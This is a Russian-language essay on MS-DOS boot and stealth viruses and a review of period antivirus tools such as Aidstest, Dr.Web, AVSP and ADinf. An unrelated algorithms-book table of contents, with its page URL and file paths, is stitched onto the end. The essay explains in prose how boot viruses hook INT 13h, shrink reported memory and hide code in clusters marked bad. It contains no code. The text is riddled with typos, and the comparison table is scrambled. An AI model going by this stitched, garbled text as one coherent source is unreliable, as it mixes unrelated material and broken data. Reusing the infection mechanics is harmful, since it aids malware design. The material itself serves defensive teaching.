Бутовые вирусы являются весьма специализированными разновидности резидентных файловых вирусов . Упрощенно бутовый вирус можно представить себе как специализированный резидентный вирус, который заражает единственны " файл " - загрузочный сектор гибкого или жесткого диска. Четкого различия между резидентными файловыми вирусами и бутовыми вирусами не существует: в последнее время появились гибриды , сочетающие заржение файлов с заражением бут-сектора винчестера. Это под - черкивает близость основных принципов организации этих двух типов вирусов.
Распространяются бутовые вирусы путем инфицирования бут-сектора дискет, причем как загружаемых ( содержащих копию MS - DOS ), так и незагружаемых (содержащих любую информацию).Заражение незагруужаемых дискет связано с определенным психо - логическим расчетом, который, к сожалению, слишком часто оправдывается : при перезагрузке MS-DOS пользователи обычно забывают проверить , вставленна ли дискета в дисковод A, и часто перезагрузка выполняется с вставленной в указанный дисковод дискетой, с которой вирус и попадает на винчестер.
Особенность BIOS , состоящая в обращении к дисководу A перед обращением к дисководу C, в настоящее время является ана - хронизмом.При наличии винчестера загрузка с дискеты является редкой операцией, в CMOS предусмотрено поле , значение которого определяет диск начальной загрузки. При необходимости загрузиться с дискеты достаточно изменить соответствующее поле CMOS.
Инфицированная дискета всгеда содержит часть кода вируса в бут-секторе, поэтому бутовые вирусы легко обнаружить. Пос - кольку структура стандартного загрузчика лишь незначительно меняется от версии к версии MS-DOS,при просмотре бут-сектора дискеты на незараженном компьютере легко видеть изменения загрузчика .
Как уже указывалось,файловые вирусы обычно состоят из одного сегмента. Впрочем, первую команду JMP , подставляемую боль - шинством файловых вирусов, дописывающих свое тело в конец файла, можно рассматривать как вырожденный сегмент. Бутовый вирус всегда состоит из нескольких сегментов. Обычно таких сегментов два: голова и хвост. Положение головы бутового вируса на дискете определено однозначно : она всегда располо - жена в бут-секторе и занимает ровно сектор . Hа винчестере ситуация немного сложнее: голова бутового вируса может рас - полагаться в одном из его двух бут-секторов - главном (MBR - MASTER BOOT RECORD), расположенном по абсолютному дисковому адресу 0/0/1,или бут-секторе логического диска C, обычно занимающего первый сектор соответствующего логического диска.
Хвост бутового вируса может рсполагаться в разных местах,например в кластерах, отмеченных на диске как сбойные и тем самым исключенных из дальнейшего распределения (псевдосбой - ные кластеры); в последних физических секторах дискеты или винчестера, поскольку они обычно всегда свободны ( при этом вирус может не отмечать их как занятые, предполагая, что запись в эти секторы выполняться не будет );в неиспользуемых блоках FAT главного каталога или одного из подкаталогов ; на дополнительных дорожках дискеты или винчестера.
Обычно хвост вируса содержит копию оригинального бут - сектора, и если она храниться в незакодированном виде, то положение хвоста в большинстве случаях можно определить глобальным контекстным поиском по дискете или винчестеру ( ис - ключением является случай использования для хвоста дополни - тельных дорожек на дискете или винчестере ). В минимальном варианте хвост может состоять только из одного сектора с оригинальным бут-сектором.
Для всех бутовых вирусов механизм заражения однотипен. Когда MS-DOS загружается с зараженного диска , бутовый вирус получает управление и сначала копирует себя в старшие адреса памяти. Затем он уменьшает размер памяти, заменяя значение, хранящееся по адресу 0040:0013 ( слово, соответствующее вектору прерываний 12h ), с тем, чтобы защитить резидентную часть вируса, и перехватывает прерывание 13h с тем, чтобы перехватывать обращения к диску. Таким образом, при любом обращении к диску управление получает обработчик этого пре - рывания, составляющий основную часть тела вируса .После этих действий вирус запускает стандартный системный загрузчик, который загружает ibmbio.com и ibmdos.com ( или io.sys и msdos.sys), т.е. происходит стандаотная загрузка системы.
Получив управление по прерыванию по чтению, вирус анализирует, относится он к дикете или к винчестеру.Если это прерывание относится к дискете, то сначала вирус проверяет, заражена уже данная дискета или нет.Для этой цели считывается бутсектор и проверяется его содержимое. Если дискета еще не заражена, то вирус заражает дискету, а затем обрабатывает команду read. Если дискета уже заражена, вирус сразу переходит к обработке команды read; также он поступает в случае, если дискета защищена от записи .
Как было отмечено выше, хвост бутового вируса может распо - лагаться в разныйх местах. Hаиболее часто бутовые вирусы размещают свой хвост в свободном кластере (ах), помечаемом как сбойный. Последнее необходимо для того, чтобы занятый вирусом кластер (ы) не был использован MS-DOS при создании нового файла, и в то же время является неплохим методом маскировки, посколку пользователи обычно плохо представляют структуру диска и не следят за количеством сбойных кластеров на нем.
Бутовые вирусы инфицируют любые дискеты, а не только системные, поскольку с не несистемной дискеты также может выпол - няться попытка загрузки MS-DOS. Чаще всего такая ситуация возникает после зависания операционной системы. Если при перезагрузке инфицированная дискета окажется в "готовом" дис - ководе A , то естествено загрузка будет сначала выполнятся с нее.В этом случае программа начальной загрузки считывает зараженный бут-сектор и передает ему управление. Вирус загру - жает себя в оперативную память и имитирует сообщение, выда - ваемое в этом случае стандартным загрузчиком ( " Non system disk " ). При этом если пользователь откроет дисковод с дискетой и нажмет клавишу Enter (Ввод), то вирус останется в памяти, заразит винчестер и в дальнейшем будет заражать все вставляемые дискеты , к которым обращались хотя бы раз (достаточно команды DIR).Поскольку все бутовые вирусы перехватывают прерывание 13h, они обычно конфликтуют с драйверами, поддерживающими нестандартные форматы ( например, 720 К). В
лучшем случае при этом происходит зависание системы или выдача сообщения о делении на ноль.В худшем случае операционная система остается работоспособной, на дискету что-то пишется но потом ничего прочитать с нее нелзя.Особое внимание следует обратить на тот факт , что бутовые вирусы перехва - тывают преравание с клавиатуры и могут пережить в оперативной памяти мягкую перезагрузку( т.е. перезагрузку с помощью нажатия клавиш Ctrl-Alt-Del ).
Следует отметить, что число известных чисто бутовых вирусов намного меньше , чем файловых, и, кроме того, скорость их размножения ниже (число дискет заведомо меньше, чем количество файлов на них). В целом заражение "чистым" бутовым вирусом является признаком беспечности и недостаточной квалификации пользователя в большей степени ,чем заражение фай - ловым вирусом.
Поскольку резкого отличия между файловыми и бутовыми виру - сами нет, некоторые вирусы являются смешанными и заражают как файлы, так и бут-секторы.Такие "гибридные вирусы" имеют более высокую инфицирующую способность, чем "чистые" типы, однако выявляются легче,чем файловые вирусы,поскольку имеют фиксированное место заражения на винчестере, целостность которого обычно контролируется большинством ревизоров.Помимо зараженных исполняемых файлов, файловобутовые вирусы могут переноситься на дискетах, содержащих только файлы дан - ных,как обычные бутовые вирусы . Кроме того, загружаясь из MBR, легче обойти резидентные средства контроля, поскольку инсталяция вируса проходит на "чистой" машине.
АКТИВHЫЕ СТЕЛС - ВИРУСЫ
Hемного о том, что такое стелс - вирусы. Этим термином называют вирусы, в алгоритмах которых заложена возможность мас - кировать свое присутствие в зараженной машине. Первые вирусы не обладали такими возможностями и их легко было обнаружить при визуальном просмотре исполняемых файлов на зараженной машине. Применение даже простейших антивирусных средств не - медленно останавливало распространение таких вирусов, и они перестали вызывать эпидемии. Появление антивирусных программ привело к новом витку в развитии технологии написания виру - сов, и появление вирусов - невидимок стало естественным ша - гом в таком развитии. Вирусы, использующие приемы маскировки нельзя увидеть средствами операционной системы ( например, нажав в VC или NC клавишу F3 ). Это происходит потому, что вирус, активно работающий вместе с операционной системой, при открытии файла на чтение немедленно удалил свое тело из зараженного файла, а при закрытии файла заразил его опять. Это только один из возможных приемов маскировки, существуют и другие. Так же маскируются и загрузочные (бутовые) вирусы При попытке прочитать ВООТ (загрузочный) сектор они заменяют его оригинальнам, не зараженным.
Hо способность к маскировке оказалась слабым местом стелс - вирусов, позволяющим легко обнаружить их наличие на машине. Достаточно сравнить информацию о файлах, выдаваемую DOS, с фактической, содержащейся на диске, и несовпадение данных однозначно говорит о наличии вируса. То есть способность к к маскировке демаскирует эти вирусы !!!
КЛАССИФИКАЦИЯ АHТИВИРУСHЫХ ПРОГРАММ
Антивирусы можно классифицировать по пяти основным группам: фильтры, детекторы, ревизоры, доктора и вакцинаторы.
Антивирусы-фильтры ( сторожа ) - это резидентные программы, которые оповещают пользователя о всех попытках какой-либо программы записаться на диск, а уж тем более отформатировать его , а также о других подозрительных действиях (например о попытках изменить установки CMOS). При этом выводится запрос о разрешении или запрещении данного действия. Принцип работы этих программ основан на перехвате соответствующих векторов прерываний. К преимуществу программ этого класса по сравнению с программами-детекторами можно отнести универсальность по отношению как к известным,так и неизвестным вирусам,тогда как детекторы пишутся под конкретные,известные на данный момент программисту виды. Это особенно актуально сейчас,когда появилось множество вирусов-мутантов,не имеющих постоянного кода. Однако, программы-фильтры не могут отсле - живать вирусы, обращающиеся непосредственно к BIOS, а также BOOT-вирусы, активизирующиеся ещe до запуска антивируса, в начальной стадии загрузки DOS. К недостаткам также можно отнести частую выдачу запросов на осуществление какой-либо операции: ответы на вопросы отнимают у пользователя много времени и действуют ему на нервы. При установке некоторых антивирусов-фильтров могут возникать конфликты с другими резидентными программами, использующими те же прерывания, которые просто перестают работать.
Наибольшее распространение в нашей стране получили программы-детекторы,а вернее программы, объединяющие в себе детек - тор и доктор. Наиболее известные представители этого класса- -Aidstest, Doctor Web, MicroSoft AntiVirus далее будут рас - смотрены подробнее. Антивирусы-детекторы расчитаны на конк - ретные вирусы и основаны на сравнении последовательности кодов содержащихся в теле вируса с кодами проверяемых программ.
Такие программы нужно регулярно обновлять, так как они быстро устаревают и не могут обнаруживать новые виды вирусов. Ревизоры - программы, которые анализируют текущее состоя - ние файлов и системных областей диска и сравнивают его с информацией, сохранённой ранее в одном из файлов данных ре - визора. При этом проверяется состояние BOOT-сектора, таб - лицы FAT, а также длина файлов, их время создания, атри - буты, контрольная сумма. Анализируя сообщения программы-ре - визора, пользователь может решить, чем вызваны изменения: вирусом или нет. При выдаче такого рода сообщений не следует предаваться панике, так как причиной изменений, например, длины программы может быть вовсе и не вирус.Самые изощренные антивирусы - вакцинаторы. Они записывают в вакцинируемую программу признаки конкретного вируса так, что вирус считает ее уже зарaженной.Таким образом, вирус не может заразить эту программу. Вакицины могут быть пассивные и активные.
Пассивная вакцина представляет собой пакетную программу, которая за один вызов обрабатывает специальным образом файл или все файла на диске либо в каталоге .Обычно при такой обработке проставляется признак,который вирус использует для того, чтобы отличить зараженные программы от незараженных. Hапример, некоторые вирусы дописывают в конец зараженных файлов определенную строку. Если искусственно дописать в конец всех программ эту строку, то такие программы не будут заражаться вирусом, поскольку он будет считать, что они уже заражены.Обработанная таким образом программа является вак - цинированной против данного вируса, при чeм операция вакци - нации является обратимой: когда опасность заражения будет ликвидированна, строку можно из файла удалить. Другие вирусы проставляют в поле даты заражаемых программ значение секунд, равное 62(MS-DOS допускает запись такого явно нереального значения).
Вакцина может проставить этот признак у всех выполняемых программ, которые тем самым будут защищены от заражения данным типом вируса. В этом случае вакцинирование является не - обратимым в том смысле, что восстановить первоначальное значение скунд не удастся,хотя они,конечно,могут быть сброшены.
Активные вакцины являются резидентными программами, действие которых основано на имитации присутствия вируса в оператив - ной памяти.Поэтому они обычно применяются против резидентных вирусов.Если такая вакцина находится в памяти, то, когда при запуске зараженной программы вирус проверяет, находится ли уже в оперативной памяти его копия , вакцина иметирует наличие копии. В этом случае вирус просто передает управление программе - хозяину и его инсталляция не происходит. Прос - тейшие вакцины представляют собой выделенный и слегка моди - фицированный (лишенный спосбности к размножению) вирус.Поэ - тому они могут быть оперативно изготовлены - быстрей чем доктора.Боле сложные вакцины (поливакцины) имитируют наличие в оперативной памяти нескольких вирусов.
Конечно,приведенный список не исчерпывает всего многообразия антивирусных программ, хотя и охватывает основые их разно - видности. Каждая из антивирусных программ подобна узкому специалисту в определенной области, поэтому оптимальной тактикой является комплексное применение нескольких типов ан - тивирусных средств.
А теперь немного о некоторых антивирусах.
AIDSTEST
В нашей стране, как уже было сказано выше, особую популярность приобрели антивирусные программы, совмещающие в себе функции детекторов и докторов. Самой известной из них явля - ется программа AIDSTEST Д.Н.Лозинского. В России практически на каждом IBM-совместимом персональном компьютере есть одна из версий этой программы. Одна из последняя версия обнаруживает более 1100 вирусов.
Aidstest для своего нормального функционирования требует, чтобы в памяти не было резидентных антивирусов, блокирующих запись в программные файлы, поэтому их следует выгрузить, либо указав опцию выгрузки самой резидентной программе, либо воспользоваться соответствующей утилитой ( например в Волков Коммандере для этих целей есть специальный пункт в меню).
При запуске Aidstest проверяет себя оперативную память на наличие известных ему вирусов и обезвреживает их. При этом парализуются только функции вируса, связанные с размножением,
а другие побочные эффекты могут оставаться. Поэтому прог - рамма после окончания обезвреживания вируса в памяти выдает запрос о перезагрузке. Следует обязательно последовать этому совету, если оператор ПЭВМ не является системным програм - мистом, занимающимся изучением свойств вирусов. При чем следует перезагрузиться кнопкой RESET, так как при "теплой пе - резагрузке" некоторые вирусы могут сохраняться. В добавок, лучше запустить машину и Aidstest с защищенной от записи дискеты, так как при запуске с зараженного диска вирус может записаться в память резидентом и препятствовать лечению.
Aidstest тестирует свое тело на наличие известных вирусов, а также по искажениям в своем коде судит о своем заражении неизвестным вирусом. При этом возможны случаи ложной тревоги,
например при сжатии антивируса упаковщиком.
Программа не имеет графического интерфейса и режимы ее работы задаются с помощью ключей.Указав путь, можно проверить не весь диск, а отдельный подкаталог.
Как показала практика, самый оптимальный режим для ежедневной работы задается ключами /g (проверка всех файлов, а не только с расширением EXE,COM,SYS) и /s (медленная проверка). Увеличивание времени при таких опциях практически не ощутимо (полностью "забитый" жесткий диск емкостью 270 Мегобайт на машине с процессором 486DX2 тестируется меньше минуты), зато вероятность обнаружения на порядок выше.
DOCTOR WEB
В последнее время стремительно растет популярность другой антивирусной программы - Doctor Web. Dr.Web также, как и Aidstest относится к классу детекторов - докторов, но в от - личие от последнего имеет так называемый "эвристический анализатор" - алгоритм, позволяющий обнаруживать неизвестные вирусы. "Лечебная паутина", как переводится с английского название программы,стала ответом отечественных программистов на нашествие самомодифицирующихся вирусов-мутантов, которые при размножении модифицируют свое тело так, что не остается ни одной характерной цепочки байт, присутствовавшей в исходной версии вируса. Dr.Web можно назвать антивирусом нового поколения по сравнению с Aidstest и его аналогами. В пользу этой программы говорит тот факт, что крупную лицензию ( на 2000 компьютеров) приобрело Главное управление информацион - ных ресурсов при Президенте РФ, а второй по величине покупатель "паутины" - "Инкомбанк".
Управление режимами также как и в Aidtest осуществляется с помощь ключей. Пользователь может указать программе тести - ровать как весь диск, так и отдельные подкаталоги или группы файлов, либо же отказаться от проверки дисков и тестировать только оперативную память. В свою очередь можно тестировать либо только базовую память,либо, вдобавок, ещe и расширенную (указывается с помощью ключа /H ).
AVSP
(Anti-Virus Software Protection)
Интересным программным продуктом является антивирус AVSP. Эта программа сочетает в себе и детектор,и доктор,и ревизор, и даже имеет некоторые функции резидентного фильтра( запрет записи в файлы с атрибутом READ ONLY).Антивирус может лечить как известные так и неизвестные вирусы, при чем о способе лечения последних программе может сообщить сам пользователь. К тому же AVSP может лечить самомодифицирующиеся и стелс-вирусы (невидимки). В состав пакета AVSP входит также резид - ентный драйвер AVSP.SYS, который позволяет обнаруживать большинство невидимых вирусов, дезактивировать вирусы на время своей работы, а также запрещает изменять READ ONLY файлы. ONLY будет снят. Поставить файлы под защиту можно клавишей F7. Еще одна функция AVSP.SYS - отключение на время работы AVSP.EXE резидентных вирусов, правда вместе с вирусами драйвер отключает и некоторые другие резидентные программы. Конечно, полностью все возможности программы реализуются в руках человека, знакомого с ассемблером и системным программированием. В AVSP имеется возможность просмат - ривать файлы в разных форматах. При входе в режим просмотра на экран выводятся две колонки: слева содержимое просматри - ваемого файла в виде шестнадцатиричных кодов, а справа - в виде ASCII-кодов. Кроме того выводится полезная системная информация, которая поможет при написании процедуры удаления вируса. Передвигая курсор,можно перейти на любой адрес, есть также функции поиска шаблонов, сравнения файлов. Можно установить, в каком формате будет просматриваться, например, заголовок: как у EXE-файла, SYS-файла или в формате загру - зочного сектора. При этом хорошо реализован сам просмотр заголовка: его системные ячейки представлены в виде таблицы: слева значение ячейки, справа - пояснение.
Еще одной полезной функцией является встроенный дизассемблер. С его помощью можно разобраться есть ли в файле вирус или при проверке диска произошло ложное срабатывание AVSP. Кроме того можно попытаться выяснить способ заражения, принцип действия вируса, а также место, куда он "спрятал" за - мещeнные байты файла (если мы имеем дело с таким типом вируса). Все это позволит написать процедуру удаления вируса и восстановить запорченные файлы. Для полного счастья нехва - тает только трассировщика,хотя в неумелых руках такая функция может привести к заражению ещe большего колличества данных. Еще одна полезная функция - выдача наглядной карты изменений. Особенно ясно я это понял, когда у меня возникло подозрение в отношении одного из файлов (который не должен был, вроде бы, меняться). Карта изменений позволяет оценить, соот - ветствуют ли эти изменения вирусу или нет, а также сузить область поиска тела вируса при дизассемблировании. При еe построении красный прямоугольник используется для изображе - ния изменeнного блока, синий - неизменeнного, а прозрачный -
- нового.
Если есть подозрение, что в систему забрался Stealth-вирус, можно запустить AVSP с параметром /D с жесткого диска, а затем загрузиться с чистой системной дискеты и запустить AVSP без параметров. Если результаты проверки контрольных сумм отличаются в обоих случаях, то подозрения оправданы. В программе AVSP есть два алгоритма нейтрализации "невидимок" и оба они работают только при наличии активного вируса в памяти.
Microsoft Antivirus
В состав современных версий MS-DOS (например 6.22) входит антивирусная программа Microsoft Antivirus (MSAV). Этот ан - тивирус может работать в режимах детектора - доктора и ревизора. MSAV имеет дружественный интерфейс в стиле MS-Windows. При запуске проверки диска (как в режиме удале - ния, так и без него) программа сначала сканирует память на наличие известных ей вирусов. При этом выводится индикация проделанной работы в виде цветной полоски и процента выпол - ненной работы. После сканирования памяти MSAV принимается за проверку непосредственно диска.
ADINF
(Advanced Diskinfoscope)
ADinf относится к классу программ-ревизоров. Антивирус имеет высокую скорость работы, способен с успехом противостоять вирусам, находящимся в памяти. Он позволяет контролировать диск, читая его по секторам через BIOS и не используя сис - темные прерывания DOS, которые может перехватить вирус. Программа ADinf получила первый приз на Втором Всесоюзном конкурсе антивирусных программ в 1990 году, а также второй приз на конкурсе Borland Contest'93.
В отличие от AVSP, в котором пользователю приходится самому анализировать, заражена ли машина стелс-вирусом, загружаясь сначала с винчестера, а потом с эталонной дискеты, в ADinf эта операция происходит автоматически. Это происходит благодаря оригинальному алгоритму противодействия этим вирусам- -"невидимкам", суть которого заключается в том, что сначала диск читается непосредственно через BIOS,а потом - с помощью DOS. Если информация будет отличаться,то в системе стелс-вирус. ADinf был единственным антивирусом, который летом 1991 года обнаружил вирус DIR, построенный на принципиально новом способе заражения и маскировки.Для лечения заражeнных файлов применяется модуль ADinf Cure Module, не входящий в пакет ADinf и поставляющийся отдельно. Принцип работы модуля -
- сохранение небольшой базы данных, описывающей контролируемые файлы. Работая совместно, эти программы позволяют обна - ружить и удалить около 97% файловых вирусов и 100% вирусов в загрузочном секторе.
В отличие от других антивирусов Advansed Diskinfoscope не требует загрузки с эталонной, защищeнной от записи дискеты. При загрузке с винчестера надежность защиты не уменьшается. ADinf имеет хорошо выполненный дружественный интерфейс, который в отличие от AVSP реализован не в текстовом, а в графическом режиме. Программа работает непосредственно с видео-памятью, минуя BIOS, при этом поддерживаются все гра - фические адаптеры. Наличие большого колличества ключей поз - воляет пользователю создать максимально удобную для него конфигурацию системы. Можно установить, что именно нужно контролировать: файлы с заданными расширениями, загрузочные сектора, наличие сбойных кластеров, новые файлы на наличие стелс-вирусов, файлы из списка неизменяемых и т.д. По своему желанию пользователь может запретить проверять некоторые каталоги (это нужно, если каталоги являются рабочими и в них всe время происходят изменения). Имеется возможность изменять способ доступа к диску (BIOS, Int13h или Int25h/26h), редактировать список расширений проверяемых файлов, а также назначить каждому расширению собственный вьюер, с помощью которого будут просматриваться файлы с этим расширением.
При инсталяции ADinf в систему имеется возможность изменить имя основного файла ADINF.EXE и имя таблиц, при этом пользователь может задать любое имя. Это очень полезная функция, так как в последнее время появилось множество вирусов, "охотящихся" за антивирусами (например, есть вирус, который изменяет программу Aidstest так,что она вместо заставки фирмы "ДиалогНаука" пишет: "Лозинский - пень"), в том числе и за ADinf.
Полезной функцией является возможность работы с DOS не выходя из программы. Это бывает полезно, когда нужно запустить внешний антивирус для лечения файла, если у пользователя нет лечащего блока ADinf Cure Module.
Еще одна интересная функция - запрещение работы с системой при обнаружении изменений на диске. Эта функция полезна, когда за терминалами работают пользователи, не имеющие ещe большого опыта в общении с компьютером.Такие пользователи по незнанию или по халатности могут проигнорировать сообщение ADinf и продолжить работу как ни в чeм не бывало, что может привести к тяжeлым последствиям. Если же установлен ключ -Stop в строке вызова ADinf AUTOEXEC.BAT, то при обнаружении изменений на диске программа потребует позвать системного программиста, обслуживающего данный терминал, а если пользователь нажмет ESC или ENTER, то система перезагрузится и все повторится снова.И всe же эта функция продумана не до конца, так как продолжение работы возможно при нажатии клавиши F10. Ведь большинство пользователей, даже если они впервые сели за компьютер, даже при минимальном на то желании смогут продолжить работу, воспользовавшись "правилом научного тыка", то есть нажав на все клавиши подряд. Для повышения надeжности защиты от таких пользователей следовало бы ввести хотя бы какой-нибудь простенький пароль.
Принцип работы ADinf основан на сохранении в таблице копии MASTER-BOOT и BOOT секторов, список номеров сбойных класте - ров, схему дерева каталогов и информацию о всех контролируемых файлах. Кроме того, программа запоминает и при каждом запуске проверяет, не изменился ли доступный DOS объем оперативной памяти (что бывает при заражении большинством загрузочных вирусов), количество установленных винчестеров, таблицы параметров винчестера в области переменных BIOS.
При первом запуске программа запоминает объем оперативной памяти, находит и запоминает адрес обработчика прерывания Int 13h в BIOS, который будет использоваться при всех последующих проверках, и строит таблицы для проверяемых дисков. При этом проверяется, показывал ли вектор прерывания 13h в BIOS перед загрузкой DOS. При последующих запусках ADinf проверяет объем оперативной памяти, доступной DOS, переменные BIOS, загрузочные сектора, список номеров сбойных кластеров (так как некоторые вирусы, записавшись в кластер, помечают его, как сбойный,чтобы их не затeрли другие данные, а также не обнаружили примитивные антивирусы). К тому же антивирус ищет вновь созданные и уничтоженные подкаталоги,новые, удаленные, переименованные, перемещeнные и изме - нившиеся файлы ( проверяется изменение длины и контрольной суммы ). Если ADinf обнаружит, что, изменился файл из списка неизменяемых, либо в файле произошли изменился без изменения даты и времени, а также наличие у файла cтранной даты ( число больше 31, месяц больше 12 или год больше текущего ) или времени ( минут больше 59, часов больше 23 или секунд больше 59 ), то он выдаст предупреждение о том, что возможно заражение вирусом.
Если обнаружены изменения BOOT-секторов, то можно в режиме диалога сравнить системные таблицы, которые были до и после изменения, и по желанию восстановить прежний сектор. После восстановления измененный сектор сохраняется в файле на диске для последующего анализа. Новые сбойные кластеры (вернее информация о них в FAT) могут появиться после запуска какой-либо утилиты, лечащей диск ( например NDD ) или благодаря действиям вируса. Если ADinf выдал сообщение,
а пользователь не запускал никаких подобных утилит, то скорее всего в компьютер забрался вирус. При получении такого сооб - щения следует продолжить проверку, внимательно следя за всеми сообщениями об изменениях файлов и загрузочных секторов. Если в системе действительно вирус, то такие сообщения не заставят себя долго ждать(ведь если все тело вируса будет находиться в "сбойном" кластере, ему никогда не передастся управление).
СВОДНАЯ ТАБЛИЦА ОПИСАННЫХ АНТИВИРУСНЫХ ПРОГРАММ
ИМЯ
AIDSTEST
DR.WEB
AVSP
ADINF
MSAV
Фильтр
Доктор
Ревизор
Детектор
Поддержка мыши
-
+
+
+
+
Оконный интерфейс
-
+
+
+
+
Обнаружение Stealth вирусов
-
-
+
+
+
Обнаружение
неизвестных
вирусов
-
+
+
+
+
Время работы при задании соответств.
режимов
/g/s
/a/s2/v
/o/u
каче
ство
*
все
файлы
по ум-
олчанию
по умол-
чанию, с
контрол.
суммами
2.5 мин
23мин
4-11
мин
1 мин
1мин
20 сек
Сноски таблицы:
* - Файлы с расширениями com,exe,ov?,bin,sys.
ПОСЛЕСЛОВИЕ
На мой взгляд, из всех отечественных программ, рассмотренных здесь ADinf является самой полной, логически завершенной антивирусной системой. Остальные программы находятся, как бы в стадии развития. Программы-фаги, в принципе, не могут достигнуть логического завершения, так как должны развиваться, чтобы противостоять новым вирусам, хотя Dr.Web уже пошел по пути усовершенствования интерфейса. Высок потенциал у программы AVSP, которая при соответствующей доработке ( уп - рощении алгоритмов поиска стелс-вирусов, введении низкоуровневой защиты, улучшении интерфейса ) может занять высокие позиции в среде антивирусов.
СПИСОК ЛИТЕРАТУРЫ
1. В.Э.Фигурнов "IBM PC для пользователя". 1993 г.
2. Ф.Файтс, П.Джонстон, М.Кратц "Компьютерный вирус: проблемы и прогноз". 1993 г.
3. Н.Н.Безруков "Классификация компьютерных вирусов MS-DOS и методы защиты от них". 1990 г.
6. Документации на антивирусные программы.
7. Собственный опыт. |
https://doc4web.ru/informatika/vb-ms-access-vc-delpi-builder-c-principitehnologiya-algoritmi-pr.html | VB, MS Access, VC++, Delphi, Builder C++ принципы(технология), алгоритмы программирования | https://doc4web.ru/uploads/files/122/58df2a4a45d9b9e9e8d038608200c0b6.docx | files/58df2a4a45d9b9e9e8d038608200c0b6.docx | Введение 8
Целевая аудитория 10
Глава 1. Основные понятия 15
Что такое алгоритмы? 15
Анализ скорости выполнения алгоритмов 16
Пространство — время 17
Оценка с точностью до порядка 17
Поиск сложных частей алгоритма 19
Сложность рекурсивных алгоритмов 20
Многократная рекурсия 21
Косвенная рекурсия 22
Требования рекурсивных алгоритмов к объему памяти 22
Наихудший и усредненный случай 23
Часто встречающиеся функции оценки порядка сложности 24
Логарифмы 25
Реальные условия — насколько быстро? 25
Обращение к файлу подкачки 26
Псевдоуказатели, ссылки на объекты и коллекции 27
Резюме 29
Глава 2. Списки 30
Знакомство со списками 31
Простые списки 31
Коллекции 32
Список переменного размера 33
Класс SimpleList 36
Неупорядоченные списки 37
Связные списки 41
Добавление элементов к связному списку 43
Удаление элементов из связного списка 44
Уничтожение связного списка 44
Сигнальные метки 45
Инкапсуляция связных списков 46
Доступ к ячейкам 47
Разновидности связных списков 49
Циклические связные списки 49
Проблема циклических ссылок 50
Двусвязные списки 50
Потоки 53
Другие связные структуры 56
Псевдоуказатели 56
Резюме 59
Глава 3. Стеки и очереди 60
Стеки 60
Множественные стеки 62
Очереди 63
Циклические очереди 65
Очереди на основе связных списков 69
Применение коллекций в качестве очередей 70
Приоритетные очереди 70
Многопоточные очереди 72
Резюме 74
Глава 4. Массивы 75
Треугольные массивы 75
Диагональные элементы 77
Нерегулярные массивы 78
Прямая звезда 78
Нерегулярные связные списки 79
Разреженные массивы 80
Индексирование массива 82
Очень разреженные массивы 85
Резюме 86
Глава 5. Рекурсия 86
Что такое рекурсия? 87
Рекурсивное вычисление факториалов 88
Анализ времени выполнения программы 89
Рекурсивное вычисление наибольшего общего делителя 90
Анализ времени выполнения программы 91
Рекурсивное вычисление чисел Фибоначчи 92
Анализ времени выполнения программы 93
Рекурсивное построение кривых Гильберта 94
Анализ времени выполнения программы 96
Рекурсивное построение кривых Серпинского 98
Анализ времени выполнения программы 100
Опасности рекурсии 101
Бесконечная рекурсия 101
Потери памяти 102
Необоснованное применение рекурсии 103
Когда нужно использовать рекурсию 104
Хвостовая рекурсия 105
Нерекурсивное вычисление чисел Фибоначчи 107
Устранение рекурсии в общем случае 110
Нерекурсивное построение кривых Гильберта 114
Нерекурсивное построение кривых Серпинского 117
Резюме 121
Глава 6. Деревья 121
Определения 122
Представления деревьев 123
Полные узлы 123
Списки потомков 124
Представление нумерацией связей 126
Полные деревья 129
Обход дерева 130
Упорядоченные деревья 135
Добавление элементов 135
Удаление элементов 136
Обход упорядоченных деревьев 139
Деревья со ссылками 141
Работа с деревьями со ссылками 144
Квадродеревья 145
Изменение MAX_PER_NODE 151
Использование псевдоуказателей в квадродеревьях 151
Восьмеричные деревья 152
Резюме 152
Глава 7. Сбалансированные деревья 153
Сбалансированность дерева 153
АВЛдеревья 154
Удаление узла из АВЛдерева 161
Бдеревья 166
Производительность Бдеревьев 167
Вставка элементов в Бдерево 167
Удаление элементов из Бдерева 168
Разновидности Бдеревьев 169
Улучшение производительности Бдеревьев 171
Балансировка для устранения разбиения блоков 171
Вопросы, связанные с обращением к диску 173
База данных на основе Б+дерева 176
Резюме 179
Глава 8. Деревья решений 179
Поиск в деревьях игры 180
Минимаксный поиск 181
Улучшение поиска в дереве игры 185
Поиск в других деревьях решений 187
Метод ветвей и границ 187
Эвристики 191
Другие сложные задачи 207
Задача о выполнимости 207
Задача о разбиении 208
Задача поиска Гамильтонова пути 209
Задача коммивояжера 210
Задача о пожарных депо 211
Краткая характеристика сложных задач 212
Резюме 212
Глава 9. Сортировка 213
Общие соображения 213
Таблицы указателей 213
Объединение и сжатие ключей 215
Примеры программ 217
Сортировка выбором 219
Рандомизация 220
Сортировка вставкой 221
Вставка в связных списках 222
Пузырьковая сортировка 224
Быстрая сортировка 227
Сортировка слиянием 232
Пирамидальная сортировка 234
Пирамиды 235
Приоритетные очереди 237
Алгоритм пирамидальной сортировки 240
Сортировка подсчетом 241
Блочная сортировка 242
Блочная сортировка с применением связного списка 243
Блочная сортировка на основе массива 245
Резюме 248
Глава 10. Поиск 248
Примеры программ 249
Поиск методом полного перебора 249
Поиск в упорядоченных списках 250
Поиск в связных списках 251
Двоичный поиск 253
Интерполяционный поиск 255
Строковые данные 259
Следящий поиск 260
Интерполяционный следящий поиск 261
Резюме 262
Глава 11. Хеширование 263
Связывание 265
Преимущества и недостатки связывания 266
Блоки 268
Хранение хештаблиц на диске 270
Связывание блоков 274
Удаление элементов 275
Преимущества и недостатки применения блоков 277
Открытая адресация 277
Линейная проверка 278
Квадратичная проверка 284
Псевдослучайная проверка 286
Удаление элементов 289
Резюме 291
Глава 12. Сетевые алгоритмы 292
Определения 292
Представления сети 293
Оперирование узлами и связями 295
Обходы сети 296
Наименьшие остовные деревья 298
Кратчайший маршрут 302
Установка меток 304
Коррекция меток 308
Другие задачи поиска кратчайшего маршрута 311
Применения метода поиска кратчайшего маршрута 316
Максимальный поток 319
Приложения максимального потока 325
Резюме 327
Глава 13. Объектноориентированные методы 327
Преимущества ООП 328
Инкапсуляция 328
Полиморфизм 330
Наследование и повторное использование 333
Парадигмы ООП 335
Управляющие объекты 335
Контролирующий объект 336
Итератор 337
Дружественный класс 338
Интерфейс 340
Фасад 340
Порождающий объект 340
Единственный объект 341
Преобразование в последовательную форму 341
Парадигма Модель/Вид/Контроллер. 344
Резюме 346
Требования к аппаратному обеспечению 346
Выполнение программ примеров 346
[email protected]
